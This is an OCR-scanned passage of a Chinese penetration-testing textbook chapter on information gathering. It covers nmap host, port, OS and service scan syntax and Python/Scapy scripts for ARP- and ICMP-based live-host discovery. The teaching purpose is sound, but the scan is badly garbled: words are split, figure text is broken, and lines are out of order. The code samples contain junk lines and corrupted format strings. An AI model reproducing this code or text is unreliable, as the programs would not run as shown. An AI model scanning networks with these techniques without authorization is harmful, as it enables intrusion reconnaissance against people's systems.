网 络 安全 渗透 测试 也 不 是 一 门 单纯 的 科学 ， 而 是 由 多 个 学 科 交 叉 而 成 。 其 中 一 个 重要 
的 组 成 部 分 正 是 情报 学 。 在 网 络 安全 渗透 测试 中 ， 有 经 验 的 专家 大 都 会 在 信息 收集 阶段 花费 
最 多 的 时 间 。 如 果 想 对 一 个 目标 进行 完整 的 测试 ， 那 么 我 们 知道 的 应 该 比 用 户 自己 还 要 多 得 
多 。 可 是 很 多 新 手 会 有 一 个 疑问 ， 如 何 才 能 获得 目标 的 信息 呢 ? 获得 信息 的 过 程 就 称 为 信息 

通过 本 章 的 学 习 之 后 ， 读 者 将 掌握 如 何 使 用 Python 编写 程序 实现 如 下 功能 。 

(1) 目标 主机 是 否 在 线 。 

(2) 目标 主机 所 在 网 络 的 结构 。 

(3 ) 目标 主机 上 开放 的 端口 ， 如 80 端口 、135 端口 、443 端口 等 。 

(4) 目标 主机 所 使 用 的 操作 系统 ， 如 Windows 7, Windows 10、Linux 2.6.18、Android 4.1.2 等 。 

(5) 目标 主机 上 所 运行 的 服务 以 及 版 本 ， 如 Apache httpd 2.2.14、OpenSSH 5.3p1 等 。 


令 
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51 信息 收集 基础 


信息 收集 获得 信息 的 方法 可 以 分 成 两 种 : 被 动 扫描 和 主动 扫描 

被 动 扫描 主要 指 的 是 在 目标 无 法 察觉 的 情况 下 进行 的 信息 收集 ， 例 如 ， 如 果 想 了 解 一 
个 远 在 天 边 的 人 ， 你 会 怎么 做 呢 ? 显然 可 以 选择 在 搜索 引擎 中 去 搜索 这 个 名 字 。 其 实 这 就 是 
一 次 对 目标 的 被 动 扫描 。Kali Linux 2 中 提供 了 很 多 这 样 优秀 的 被 动 扫描 工具 ， 如 Maltego、 
Recon-NG 和 Shodan。 

相 比 被 动 扫描 来 说 ， 主 动 扫描 的 范围 要 小 得 多 。 主 动 扫描 一 般 都 是 针对 目标 发 送 特制 的 
数据 包 ， 然 后 根据 目标 的 反应 来 获得 一 些 信息 。 这 种 扫描 方式 的 技术 性 比较 强 ， 通 常会 使 用 专 
业 的 扫描 工具 来 对 目标 进行 扫描 。 扫 描 之 后 将 会 获得 的 信息 包括 : 目标 网 络 的 结构 ， 目 标 网 络 
所 使 用 设备 的 类 型 ， 目 标 主机 上 运行 的 操作 系统 ， 目 标 主机 上 所 开放 的 端口 ， 目 标 主机 上 所 提 
供 的 服务 ， 目 标 主 机 上 所 运行 的 应 用 程序 。 本 章 将 主要 围绕 主动 扫描 部 分 进行 讲解 。 在 本 章 中 
会 大 量 使 用 到 nmap 库 ， 在 开始 Python 编程 之 前 先 来 简单 介绍 nmap 这 个 工具 的 使 用 。 这 个 工 
具 的 使 用 方法 十 分 简单 ， 只 需要 在 终端 中 输入 nmap 加 上 参数 即 可 完成 ， 如 图 5-1 所 示 


root@kali: ~ °eo 


rch Terminal Help 


) foptions] {target specification 

图 5-1 在 Kali 中 启动 nmap 
选择 扫描 目标 的 nmap 语法 如 下 所 示 
(1) 扫描 指定 他 主机 : nmap 192.168.169.133， 如 图 5-2 所 示 
(2 ) 扫描 指定 域名 主机 : nmap www.nmap.com。 
(3 ) 扫描 指定 范围 主机 : nmap 192.168.169.1-20 
(4 ) 扫描 一 个 子 网 主机 : nmap 192.168.169.0/24 


对 目标 的 端口 进行 扫描 的 nmap 语法 如 下 所 示 。 
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(1) 扫描 一 个 主机 的 特定 端口 : nmap -p 22 192.168. 169.1。 

(2 ) 扫描 指定 范围 端口 : nmap -p 1-80 192.168. 169.1。 

(3 ) 扫描 100 个 最 为 常用 的 端口 : nmap -F 192.168. 169.1。 

对 目标 端口 状态 进行 扫描 的 nmap 语法 如 下 所 示 。 

(1 ) 使 用 TCP 全 开 扫 描 : nmap -sT 192.168. 169.1。 

(2) 使 用 TCP 半 开 扫描 : nmap -sS 192.168. 169.1. 

(3 ) 使 用 UDP 扫描 : nmap -sU -p 123,161,162 192.168. 169.1. 
对 目标 的 操作 系统 和 运行 服务 进行 扫描 的 nmap 语法 如 下 所 示 。 
(1) 扫描 目标 主机 上 运行 的 操作 系统 : nmap -O 192.168.169.1。 
(2) 扫描 目标 主机 上 运行 的 服务 类 型 : nmap -sV 192.168.169.1。 


5.2 主机 状态 扫描 


处 于 运行 状态 而 且 网 络 功能 正常 的 主机 被 称 为 活跃 主机 ， 反 之 则 称 为 非 活跃 主机 。 在 对 
一 台 主 机 进行 渗透 测试 的 时 候 需要 明确 这 台 主 机 的 状态 ， 这 一 点 在 对 大 型 网 络 进行 测试 时 尤 
为 重要 。 试 想 一 下 如 果 一 台 主 机 根本 没有 连 上 网 络 ， 那 么 对 其 进行 网 络 安全 渗透 测试 还 有 什 
么 意义 呢 ? 目前 很 多 渗透 测试 工具 都 提供 了 对 目标 状态 扫描 的 功能 ， 接 下 来 介绍 对 主机 的 状 
态 进 行 扫描 的 原理 以 及 使 用 Python 语言 的 具体 实现 。 

如 今 的 互联 网 结构 极其 复杂 ， 各 种 不 同 硬件 架构 ， 运 行 着 各 种 不 同 操作 系统 的 设备 令 
人 惊讶 地 连接 在 一 起 。 这 一 切 都 要 归功 于 网 络 协 议 。 网 络 协 议 通常 是 按照 不 同 层次 开发 出 来 
的 ， 每 个 不 同 层次 的 协议 负责 的 通信 功能 也 各 自 不 同 ， 作 为 计算 机 网 络 中 进行 数据 交换 而 建 
立 的 规则 、 标 准 或 约定 的 集合 ， 这 些 协议 “各 尽 其 能 ， 各 司 其 职 ”。 目 前 的 分 层 模 型 有 OSI 
和 TCP/IP 两 种 。 本 书 中 涉及 的 模型 都 采用 了 TCP/IP 分 层 结构 ， 因 为 这 个 结构 更 简洁 实用 。 

这 些 协议 与 2.1 节 中 讲 的 例子 又 有 什么 关系 呢 ? 你 还 记得 为 什么 有 人 项 门 ， 屋 里 的 人 就 
会 有 回应 吗 ? 对， 因为 这 是 一 个 生活 中 的 约定 俗 成 。 而 这 里 讲述 的 协议 恰恰 就 如 同 这 个 约定 
一 样 ， 这 些 协议 中 明确 规定 了 如 果 一 台 计 算 机 收 到 来 自 另 一 台 计算 机 的 特定 格式 数据 包 后 应 
该 如 何 处 理 。 例 如 ， 这 里 有 一 个 TEST 协议 (这 个 协议 目前 并 不 存在 ， 仅 用 于 举例 ， 这 里 假 
设 A 主 机 和 B 主机 都 遵守 这 个 协议 )， 它 规定 了 如 果 一 台 主 机 A 收 到 了 来 自 于 B 的 格式 为 
“请 求 ”的 数据 包 ， 那 么 它 必须 在 一 定时 间 内 向 主机 B 再 发 送 一 个 格式 为 “回应 ”的 数据 包 
(实际 上 这 个 过 程 在 很 多 真实 的 网 络 协 议 中 都 存在 )。 

那么 ， 如 果 现在 想 知道 主机 A 是 否 为 活跃 主机 ， 你 该 知道 怎么 办 了 吧 ? 只 需要 在 你 的 主 
机 上 构造 一 个 “请 求 "， 然 后 将 它 发 送 给 主机 B。 如 果 主 机 B 是 活跃 主机 ， 那 么 你 就 会 收 到 
来 自 它 的 “回应 ”数据 包 ， 否 则 什么 都 收 不 到 。 
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在 实际 操作 中 ， 可 以 利用 哪些 真实 的 协议 呢 ? 哪些 协议 有 如 同 前 面 所 述 的 规定 呢 ? 所 有 
的 协议 规范 都 可 以 参考 Request For Comments ( RFC) 文档 ， 这 是 一 系列 以 编号 排 定 的 文件 。 
基本 的 互联 网 通信 协议 在 RFC 文件 内 都 有 详细 说 明 。 


5.2.1 基于 ARP 的 活跃 主机 发 现 技术 


ARP 的 中 文 名 字 是 “地 址 解析 协议 "， 主 要 用 在 以 太 网 中 。 这 里 有 一 点 需要 明确 的 是 ， 
所 有 的 主机 在 互联 网 中 通信 的 时 候 使 用 的 是 P 地址， 而 在 以 太 网 中 通信 时 使 用 的 却 是 硬件 地 
址 (也 就 是 常 说 的 MAC 地 址 )。 

但 是 日 常 使 用 的 程序 却 无 须 考 虑 这 一 点 。 当 程序 进行 通信 的 时 候 ， 无 论 通信 的 目的 位 于 
遥远 的 美国 ， 还 是 近 在 腿 尺 ， 标 识 身份 的 都 是 IP 地 址 。 经 常 进行 软件 开发 的 人 也 会 知道 绝 大 
部 分 的 网 络 应 用 都 没有 考虑 过 硬件 地 址 。 

那么 现在 问题 就 来 了 ， 既 然 在 以 太 网 中 无 法 使 用 IP 地 址 通信 ,那么 这 些 没有 考虑 过 硬 
件 地 址 的 网 络 应 用 又 是 如 何 工 作 的 呢 ? 是 只 能 应 用 于 互联 网 中 吗 ? 还 是 有 别 的 什么 办 法 ? 

几乎 所 有 的 网 络 应 用 都 能 在 以 太 网 中 正常 工作 ， 这 其 实 就 是 依靠 了 刚刚 提 到 过 的 ARP, 
这 个 协议 用 来 在 只 知道 了 地 址 的 情况 下 去 发 现 硬 件 地 址 。 例 如 所 在 的 主机 IP 为 192.168.1.1， 
而 通信 的 目标 IP 地 址 为 192.168.1.2， 同 一 网 络 中 还 有 192.168.1.3 和 192.168.1.4。 但 是 这 4 
台 主 机 位 于 同一 以 太 网 中 ， 使 用 一 台 交 换 机 进行 通信 。 但 是 通信 时 使 用 的 是 硬件 地 址 ， 这 个 


以 太 网 的 结构 如 图 5-3 所 示 。 
J 地 址 :192.168.1.2 
N5 硬件 地 址 : 22:22:22:22:22:22 
SS 


也 地 址 :192.168.1.1 
硬件 地 址 : 11:11:11:11:11:11 N 
D 
SS 


IP 地 址 : 192.168.1.3 
硬件 地 址 ，33:33:33:33:33:33 


JP 地址 : 192.168.1.4 
硬件 地 址 : 44:44:44:44:44:44 
ss 
图 5-3 ”当前 以 太 网 的 结构 
当 所 使 用 的 主机 只 知道 目标 的 主机 地 址 却 不 知道 目标 的 硬件 地 址 的 时 候 ， 就 需要 使 用 以 
太 广 播 包 给 网 络 上 的 每 一 台 主 机 发 送 ARP 请 求 。 这 个 请 求 的 格式 如 下 。 
协议 类 型 : ARP Request (ARP 请 求 ) 


源 主机 IP 地 址 : 192.168.1.1 
目标 主机 IP 地 址 : 192.168.1.2 


包 中 
接收 
如 果 
ARP 


表 中 


项 


因为 
图 的 
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源 主机 硬件 地 址 :11:11:11:11:11:11 
目标 主机 MAC 地 址 : ff:ff:ff:ff:ff:ff 


当 网络 中 的 其 余 三 台 主 机 在 接收 到 这 个 ARP 请 求 数据 包 之 后 ， 它 会 用 自己 的 IP 地 址 与 
头 部 的 目标 主机 IP 地 址 相 比较 ， 如 果 不 匹 配 ， 就 不 会 做 出 回应 。 例 如 ，192.168.1.3 在 
到 这 个 数据 包 时 ， 就 使 用 本 身 地 址 和 192.168.1.2 进行 比较 ， 如 发 现 不 同 ， 不 做 出 回应 。 
匹配 ， 例 如 ，192.168.1.2 收 到 这 个 请 求 ， 这 个 设备 就 会 给 发 送 IP 请 求 的 设备 发 送 一 个 
回应 数据 包 ， 这 个 回应 的 格式 如 下 。 


协议 类 型 : ARP Reply (ARP 回应 ) 


源 主机 硬件 地 址 :22 
目标 主机 MAC 地 址 : 


这 个 回应 数据 包 并 不 是 广播 包 ， 当 主机 收 到 这 个 回应 之 后 ， 就 会 把 结果 放 在 ARP 缓存 


。 缓 存 表 的 格式 为 : 
IP 地 址 硬件 地 址 类 型 
192.168.1.2 22:22:22:22:22:22 动态 


以 后 当主 机 再 需要 和 192.168.1.2 通信 时 ， 只 需要 查询 这 个 ARP 缓存 表 ， 找 到 对 应 的 表 


， 查 询 到 硬件 地 址 以 后 按照 这 个 地 址 发 送出 去 即 可 。 


当 目标 主机 与 我 们 处 于 同一 以 太 网 的 时 候 ， 利 用 ARP 对 其 进行 扫描 是 一 个 最 好 的 选择 ， 
这 种 扫描 方式 最 快 ， 也 最 为 精准 。 没 有 任何 的 安全 措施 会 阻止 这 种 扫描 方式 。 接 下 来 以 
形式 来 演示 一 下 这 个 扫描 过 程 。 

第 一 步 : 向 目标 发 送 一 个 ARP Request， 如 图 5-4 所 示 。 


图 5-4 向 目标 主机 发 送 一 个 ARP 请 求 
第 二 步 : 如 果 目 标 主机 处 于 活跃 状态 ， 它 一 定 会 回应 一 个 ARP Reply, WE 5-5 所 示 。 


š — 
ARP Request 
SS 一 ARP Repl 
Reply S 
客户 机 服务 器 


图 5-5 目标 主机 处 于 活跃 状态 的 情形 
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第 三 步 : 但 是 如 果 目 标 主机 处 于 非 活跃 状态 ， 它 不 会 给 出 任何 回应 ， 如 图 5-6 所 示 。 


——FFTs T Is oÀwzp%wK@5 


N ARP Request 


之 后 没有 收 到 任何 回应 
客户 机 服务 器 
图 5-6 目标 主机 处 于 非 活跃 状态 的 情形 
现在 来 编写 一 个 利用 ARP 实现 的 活跃 主机 扫描 程序 ， 这 个 程序 有 很 多 种 方式 可 以 实 
现 ， 首 先 借助 Scapy 库 来 完成 。 其 核心 思想 就 是 要 产生 一 个 ARP 请 求 ， 首 先 查 看 Scapy 库 中 
ARP 类 型 数据 包 中 需要 的 参数 ， 如 图 5-7 所 示 


ls (ARP) 
: XShortField 
: XShortEnumField 
: ByteField 
: ByteField 


: ShortEnumField 

: ARPSourceMACField 
: SourceIPField 

: MACField 

: IPField 


nnn 


'0.0.0.0') 


图 5-7 Scapy 库 中 的 ARP 数据 包 的 参数 
可 以 看 到 这 里 面 的 大 多 数 参数 都 有 默认 值 ， 其 中 ，hwsrc 和 psrc 分 别 是 源 硬 件 地 址 和 源 
IP 地 址 。 这 两 个 地 址 不 用 设置 ， 发 送 的 时 候 会 自动 填写 本 机 的 地 址 。 唯 一 需要 设置 的 是 目的 
IP 地 址 pdst， 将 这 个 地 址 设置 为 目标 即 可 
另外 ， 因 为 发 送 的 是 广播 数据 包 ， 所 以 需要 在 Ether 层 进行 设置 ， 首 先 查 看 一 下 Ether 
的 格式 ， 如 图 5-8 所 示 


ls(Ether) 
: DestMACField (None) 


: SourceMACField (None) 
: XShortEnumField (36864) 


Ë5-8 Scapy 库 中 的 Ether 数据 包 的 参数 
这 一 层 只 有 三 个 参数 ，dst 是 目的 硬件 地 址 ，src 是 源 硬件 地 址 ， 这 里 面 src 会 自动 设置 
为 本 机 地 址 。 所 以 只 需要 将 dst 设置 为 住 住 佳 佳 住 任 即 可 将 数据 包 发 到 网 络 中 的 各 个 主机 上 。 
下 面 构造 一 个 扫描 192.168.1.103 的 ARP 请 求 数 据 包 并 将 其 发 送出 去 : 
>>>ans, unans=srp (Ether (dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.103"),timeout=2) 


这 个 命令 将 会 产生 一 个 如 图 5-9 所 示 的 数据 包 。 
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> Frame 449: 60 bytes on wire (480 bits), 60 bytes captured (480 bits) on interface 9 
> Ethernet II, Src: dc:fe:18:58:8c:3b, Dst: ff:ff:ff:ff:ff:ff 
4 Address Resolution Protocol (request) 

Hardware type: Ethernet (1) 

Protocol type: IPv4 (0x080) 

Hardware size: 6 

Protocol size: 4 

Opcode: request (1) 

Sender MAC address: dc:fe:18:58:8c:3b 

Sender IP address: 192.168.1.1 

Target MAC address: 00:00:00:00:00:00 

Target IP address: 192.168.1.103 


图 5-9 Scapy 命令 所 产生 的 ARP 数据 包 
按照 之 前 的 思路 ， 需 要 对 这 个 请 求 的 回应 进行 监听 ， 如 果 得 到 回应 ， 那 么 证 明 目 标 在 
线 ， 并 打印 输出 这 个 主机 的 硬件 地 址 : 
>>> ans.summary (lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%") ) 
如 果 收 到 了 数据 包 , 那么 这 个 过 程 就 如 下 所 示 ， 发 出 一 个 数据 包 “ Who has 
192.168.1.103 ? Tell 192.168.1.1"， 并 收 到 这 个 数据 包 的 回应 “192.168.1.103 is at 4c:cc : 
6a:62:4e:29"”， 这 表明 目标 主机 在 线 ， 如 图 5-10 所 示 。 


Source Testimtion Protocol Length Info 
dc:fe:18:58:8c:3b ff:ff:ff:ff:ff:ff o ARP 60 Who has 192.168.1.103? Tell 192.168.1.1 
Ac:cc:6a:62:4e:29 dc: fe:18:58:8c:3b — ARP 42 192.168.1.103 is at 4c:cc:6a:62:4e:29 


图 5-10 发 出 ARP 请 求 并 得 到 回应 


如 果 发 出 这 个 数据 包 ， 但 是 没有 收 到 这 个 数据 包 回应 ， 则 说 明 目 标 主机 不 在 线 ， 如 图 
5-11 所 示 。 


[Source Testination Frotocol Length Info 
de: fe: 18:58:8c:3b ff:ff:ff:ff:ff:ff ARP 60 Who has 192.168.1.103? Te11 192.168.1.1 


图 5-11 发 出 ARP 请 求 没有 得 到 回应 
前 面 在 命令 行 中 完成 了 这 个 扫描 ， 现 在 编写 一 个 完整 的 程序 ， 完 整 的 程序 内 容 如 下 
所 示 。 


import sys 
if len(sys.argv) != 2: 

print "Usage: arpPing <IP>\n eg: arpPing 192.168.1.1" 

sys.exit(1) 
from scapy.all import srp,Ether,ARP 
ans,unans=srp (Ether (dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=sys.argv[1]),timeout=2) 
for snd,rcv in ans: 

print ("Target is alive") 

print rcv.sprintf ("%Ether.src% - %ARP.psrc%") 


在 Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 arpPing 为 名 保存 起 来 ， 但 是 这 个 程 
序 需 要 一 个 参数 ， 在 空白 处 右 击 ， 在 弹出 的 菜单 中 依次 选中 Run As 一 Run Configurations…， 
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如 图 5-12 所 示 。 


R 1 Python Run 
Replace With >! 2Python unit-test 


pos : 
图 5-12 ”运行 参数 菜单 


然后 在 弹出 的 Run Configurations 中 选中 Arguments 标签 ， 并 在 Program arguments 中 填 
写本 次 要 扫描 的 目标 地 址 “192.168.1.133"， 这 样 就 为 程序 添加 了 参数 ， 如 图 5-13 所 示 。 


“w _— 


02.168.160.13 


图 5-13 ”设置 运行 时 的 菜单 


指定 完 参数 之 后 ， 依 次 单 击 Apply 一 Run， 该 程序 开始 执行 ,在 下 方 的 Console 处 会 显 
示 出 执行 的 结果 ， 如 图 5-14 所 示 。 


Console x 


<terminated> 192.168.169.133 
Begin emission: 

Finished to send 1 packets. 
. 


画 root@kali: ~ 


E Problems Fi PyUnit 
= x #$ Q, G 


arget is alive 
00:0c:29:2d:7f:89 - 192.168.169.133 


5-14 arpPing.py 执行 的 结果 


除了 使 用 Scapy 这 个 库 来 完成 ARP 扫描 之 外 ， 也 可 以 使 用 更 为 简单 的 Nmap 库 。 这 种 
方法 更 为 简单 高 效 ， 但 是 对 于 初学 者 来 说 无 法 了 解 其 中 具体 的 实现 ， 所 以 希望 初学 者 能 将 这 
两 种 方法 都 掌握 。 在 Python 中 使 用 Nmap 库 其 实 就 是 调用 了 Nmap 工具， 这 个 库 的 核心 类 为 
PortScanner。 这 个 类 提供 了 一 个 函数 scan()， 可 以 如 同 在 Nmap 中 使 用 命令 行 一 样 地 使 用 这 
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个 函数 ，-PR 表示 使 用 ARP，-sn 表示 只 测试 该 主机 的 状态 (这 里 是 为 了 加 快 扫描 速度 )。 在 
Nmap 中 使 用 ARP 进行 扫描 的 语法 格式 为 : 


Nmap -PR -sn [目标 IP] 
也 可 以 使 用 Nmap 库 来 实现 对 目标 进行 的 ARP 扫描 ， 编 写 的 程序 如 下 所 示 。 


import sys 
if len(sys.argv) != 2: 
print "Usage: arpPing2 <IP> eg: arpPing2 192.168.1.1" 
sys.exit(1) 
import nmap 
nm = nmap.PortScanner() 
nm.scan(sys.argv[1], arguments='-sn -PR') 
for host in nm.all_hosts(): 
us 2 De a A a a kay6ikusuaaapssisi k: 
print('Host : $s (%s)' % (host, nm[host].hostname())) 
print('State : %s' % nm[host].state()) 


在 Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 arpPing2 为 名 保存 起 来 ， 在 Run 
Configurations 中 为 这 个 程序 指定 一 个 参数 “192.168.1.133”， 然 后 执行 ， 如 图 5-15 所 示 。 


[ 


EJ Console x | 画 rootQ@kali:~ £ Problems  RBPyUnit 
axon R ABE 


| <terminated> 192.168.169.133 


Host : 192.168.169.133 () 
State : up 


图 5-15 使 用 arpPing2.py 扫描 192.168.169.133 的 结果 


这 个 程序 也 可 以 用 来 扫描 一 个 范围 内 的 主机 ， 例 如 192.168.169.0/24， 只 需要 为 这 个 程 
序 指定 参数 ， 然 后 执行 ， 图 5-16 给 出 了 执行 的 结果 。 


EJ Console x | 画 root@kal:~ © Problems Fù PyUnit 


# x 39 Q ü Ü a 
<terminated> 192.168.169.0/24 


State : up 


State : up 


Host : 192.168.169.133 () 
State : up 


图 5-16 使 用 arpPing2.py 扫描 192.168.169.0/24 的 结果 


基于 ARP 的 扫描 是 一 种 最 为 高 效 的 方法 ,但 是 它 的 局 限 性 也 很 明显 ， 只 能 够 扫描 同一 
以 太 网 内 的 主机 。 例 如 ， 主 机 的 下 地 址 为 192.168.169.130， 子 网 掩 码 为 255.255.255.0， 那 
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么 使 用 ARP 扫描 的 范围 只 能 是 192.168.169.1-255。 如 果 目 标的 地 址 为 192.168.1.100， 这 种 
方法 就 不 适用 了 。 


5.2.2 ”基于 ICMP 的 活跃 主机 发 现 技术 


ICMP 也 位 于 TCP/IP 协议 族 中 的 网 络 层 ， 它 的 目的 是 用 于 在 了 P 主机 、 路 由 器 之 间 传 递 
控制 消息 。 没 有 任何 的 系统 是 完美 的 ， 互 联网 也 一 样 。 因 此 ， 互 联网 也 经 常会 出 现 各 种 错 
误 ， 为 了 发 现 和 处 理 这 些 错 误 的 ICMP (Internet Control Message Protocol， 互 联网 控制 报 文 
协议 ) 应 运 而 生 。 同 样 ， 这 种 协议 也 可 以 用 来 实现 活跃 主机 发 现 。 有 了 之 前 ARP 主机 发 现 技 
术 的 经 验 之 后 ， 再 来 了 解 一 下 ICMP 这 个 协议 是 如 何 进行 活跃 主机 发 现 的 。 相 比 ARP 简单 明 
了 的 工作 模式 ，ICMP 虽然 要 复杂 一 些 ， 但 是 用 来 扫描 活跃 主机 的 原理 却 是 一 样 的 。 

ICMP 中 提供 了 多 种 报 文 ， 这 些 报 文 又 可 以 分 成 两 大 类 : 差错 报 文 和 查询 报 文 。 其 中 ， 
查询 报 文 都 是 由 一 个 请 求 和 一 个 应 答 构 成 的 。 这 一 点 和 之 前 讲 过 的 TEST 协议 一 样 ， 只 需要 
向 目标 发 送 一 个 请 求 数据 包 ， 如 果 收 到 了 来 自 目标 的 回应 ， 就 可 以 判断 目标 是 活跃 主机 ， 否 
则 可 以 判断 目标 是 非 活跃 主机 ， 这 与 ARP 扫描 原理 是 相同 的 。 

但 是 ， 与 ARP 扫描 不 同 的 地 方 在 于 ICMP 查询 报 文 有 4 种 ， 分 别 是 响应 请 求 或 应 答 、 
时 间 戳 请 求 或 应 答 、 地 址 掩 码 请 求 或 应 答 、 路 由 器 询问 或 应 答 。 但 是 在 实际 应 用 中 ， 后 面 的 
三 种 成 功率 很 低 ， 所 以 本 节 主 要 讲解 第 一 种 ICMP 查询 报 文 。 

Ping 命令 就 是 响应 请 求 或 应 答 的 一 种 应 用 ,我们 经 常会 使 用 这 个 命令 来 测试 本 地 与 目标 
之 间 的 连通 性 ， 例 如 我 们 所 在 的 主机 IP 为 192.168.1.1， 而 通信 的 目标 IP 地 址 为 192.168.1.2， 
如 果 要 判断 192.168.1.2 是 否 为 活跃 主机 ， 就 需要 向 其 发 送 一 个 ICMP 请 求 ， 这 个 请 求 的 格式 
如 下 。 

IP 层 内 容 

源 IP 地 址 : 192.168.1.1 

目的 IP 地 址 : 192.168.1.2 

ICMP 层 内 容 

Type: 8 (表示 请 求 ) 

如 果 192.168.1.2 这 台 主 机 处 于 活跃 状态 ， 它 在 收 到 了 这 个 请 求 之 后 ， 就 会 给 出 一 个 回 
应 ， 这 个 回应 的 格式 如 下 所 示 。 


IP 层 内 容 

源 IP 地 址 : 192.168.1.2 
目的 IP 地 址 : 192.168.1.1 
ICMP 层 内 容 

Type: 0 (表示 应 答 ) 


接 下 来 以 图 的 形式 演示 一 下 这 个 扫描 过 程 。 
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第 一 步 : 向 目标 发 送 一 个 ICMP Request， 如 图 5-17 所 示 。 


一 > 


ICMP Request 


图 5-17 向 目标 主机 发 送 一 个 ICMP 请 求 


第 二 步 : 如 果 目 标 主机 处 于 活跃 状态 ， 在 正常 情况 下 它 就 会 回应 一 个 ICMP Reply， 如 图 
5-18 所 示 。 


x 


ICMP Request 


ICMP Reply 


客 


YT 
= 


服务 器 
图 5-18 目标 主机 处 于 活跃 状态 的 情形 


需要 注意 的 是 ， 由 于 现在 很 多 网 络 安全 设备 或 者 机 制 会 屏蔽 ICMP， 在 这 种 情况 下 即使 
目标 主机 处 于 活跃 状态 ， 也 收 不 到 任何 的 回应 。 
第 三 步 : 如 果 目 标 主 机 处 于 非 活 跃 状 态 ， 它 不 会 给 出 任何 回应 ， 如 图 5-19 所 示 。 


D ICMP Request 


之 后 没有 收 到 任何 回应 


x 


图 5-19 目标 主机 处 于 非 活跃 状态 的 情形 


也 就 是 说 ， 只 要 收 到 了 ICMP 回应 ， 就 可 以 判断 该 主机 为 活跃 状态 。 

现在 来 编写 一 个 利用 ICMP 实现 的 活跃 主机 扫描 程序 ， 这 个 程序 有 很 多 种 方式 可 以 实 
M, 首先 借助 Scapy 库 来 完成 。 其 核心 思想 就 是 要 产生 一 个 ICMP 请 求 ， 首 先 查 看 Scapy E 
中 ICMP 类 型 数据 包 中 需要 的 参数 ， 如 图 5-20 所 示 。 

这 里 面 的 大 多 数 参数 都 不 需要 设置 ， 唯 一 需要 注意 的 是 type， 这 个 参数 的 默认 值 已 经 是 
8， 所 以 无 须 修改 。 

另外 ，ICMP 并 没有 目标 地 址 和 源 地 址 ， 所 以 需要 在 人 P 中 进行 设置 ， 首 先 查看 一 下 
Scapy 库 中 IP 类 型 数据 包 中 需要 的 参数 ， 如 图 5-21 所 示 。 
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ls(ICMP) 
: ByteEnumField 


: MultiEnumField (Depends on type) 


: XShortField 


XShortFi (Cond 


) 


: ICMPTimeStampField (Cond) 
: ICMPTimeStampField (Cond) 
: ICMPTimeStampField (Cond) 


: IPField (Cond) 

: ByteField (Cond) 

: ByteField (Cond) 

: ByteField (Cond) 

: IPField (Cond) 
ShortField (Cond) 
ShortField (Cond) 

: IntField (Cond) 


reserved 
length 
addr mask 
nexthopmtu 
unused 
unused 


(30466240) 
30466240) 
(30466240) 


BI 5-20 Scapy 库 中 的 ICMP 数据 包 的 参数 


ls(IP) 
version 
ihl 
tos 
len 
id 
flags 


: BitField (4 bit 
: BitField (4 bit 
: XByteField 
: ShortField 
: ShortField 


s) 
s) 


: FlagsField (3 bits) 


frag : BitField (13 bits) 


ttl 
proto 
chksum 
src 

dst 
options 


: ByteField 

: ByteEnumField 

: XShortField 

: PacketListField 


图 5-21 


: SourceIPField (Emph) 
: DestIPField (Emph) 


(4) 
(None) 
(0) 
(None) 
(1) 
(0) 


(0) 
(None) 
(None) 
(None) 
([]) 


Scapy 库 中 的 IP 数据 包 的 参数 


这 一 层 和 地 址 有 关 的 参数 有 两 个 : dst 是 目的 IP 地 址 ，src 是 源 IP 地 址 


为 本 机 地 址 


这 里 面 src 会 自动 设置 


包 发 到 目标 主机 上 


所 以 


f- -d 
只 需 


>>> ans,unans=sr (IP (dst="192.168.1.2")/ICMP()) 


按照 之 前 的 思路 ， 需 要 对 这 
线 ， 并 打印 输出 这 个 主机 的 IP 地 址 


>>> ans.summary(lambda (s,r): 


要 将 dst 
接 下 来 构造 一 个 扫描 192.168.1.2 的 ICMP 


irt ua. 


设置 为 “192.168.1.2” 即 可 将 数据 
请 求 数 据 包 并 将 其 发 送出 去 。 


个 请 求 的 回应 进行 监听 ， 如 果 得 到 了 回应 ， 那 么 证 明 目 标 在 


r.sprintf("%$IP.src% is alive") ) 


如 果 收 到 数据 包 ,， 那么 这 个 过 程 如 图 5-22 所 示 ， 发 出 一 个 Echo ( ping) request 数据 包 ， 


并 收 到 这 个 数据 包 的 回应 Echo (ping) reply, XRH H H 


机 在 


Source Destination Protoco Length Info 


192.168.169.139 192.168.169.133 ICMF 98 Echo (ping) request id=0x05ff, seq=2/512, ttl=64 (reply in 508) 
192.168.169.133 192.168.169.130 ICMP 98 Echo (ping) reply id=0x05ff, seq=2/512, ttl=128 (request in 507) 
图 5-22 ”发 出 ICMP 请 求 并 得 到 回应 


如 果 发 出 这 个 数据 包 ， 但 是 没有 收 到 这 个 数据 包 回应 ， 则 说 明 目 标 主机 不 在 线 ， 如 
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图 5-23 所 示 。 


Source Destination Protoco Lengt Info 
192.168.169.130 192.168.168.1 ICMP 98 Echo (ping) request id=0x0761, seq=1/256, ttl=64 (no response found!) 


BI 5-23 Rih ICMP 请 求 并 没有 得 到 回应 


前 面 在 命令 行 中 完成 了 这 个 扫描 ， 现 在 来 编写 一 个 完整 的 ICMP 扫描 程序 。 完 整 的 程序 
内 容 如 下 所 示 。 


import sys 

if len(sys.argv) != 2: 
print "Usage: icmpPing <IP>Nn eg: icmpPing 192.168.1.1" 
sys.exit(1) 

from scapy.all import sr,IP,ICMP 

ans,unans=sr(IP(dst= sys.argv[1])/ICMP()) 

for snd,rcv in ans: 
print rcv.sprintf("%IP.src% is alive") 


在 Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 icmpPing.py 为 名 保存 起 来 。 但 
是 这 个 程序 需要 一 个 参数 ， 可 以 在 Run Configurations 中 设置 本 次 要 扫描 的 目标 地 址 
“192.168.1.1” 为 运行 的 参数 ， 执 行 的 结果 如 图 5-24 所 示 。 


| Console x |M root@kali:~ © Problems Fù PyUnit 
| 


# X 5, G Ü a BE 
| |<terminated> 192.168.1.1 
[| Begin emission: 
[| -Finished to send 1 packets. 


gt 1 answers, remaining 0 packets 


图 5-24 icmpPing.py 执行 的 结果 
也 可 以 使 用 更 简单 的 Nmap 库 来 实现 这 个 功能 。 在 Nmap 中 使 用 ，-PE 表示 使 用 ICMP， 
